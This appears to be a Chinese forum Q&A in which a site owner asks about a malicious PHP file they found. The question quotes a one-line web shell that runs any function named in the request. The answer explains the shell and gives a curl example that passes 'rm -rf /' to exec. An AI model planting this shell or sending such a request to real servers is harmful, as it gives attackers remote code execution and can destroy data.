微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

刚发现恶意的PHP代码

我使用以下代码在我的主机帐户上发现了恶意PHP文件

<?=$_GET[0]($_POST[1]);?>

请帮助我更好地理解这段代码,这个代码对于上传者有什么可能?

提前致谢.

解决方法:

$func = 'strlen';
$arg  = 'foo';

echo $func($arg); // output: 3

您正在查看变量函数调用.在您的情况下,函数名称来自URL中的查询字符串和HTTP POST正文中的参数.所以,这可以执行任何事情.可能有人会尝试使用它来通过exec执行shell代码.

例如.:

$curl example.com/infected_file.PHP?exec -d 'rm%20-rf%20/'

(不是100%肯定会这样做,我不想尝试,但你明白了.)

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐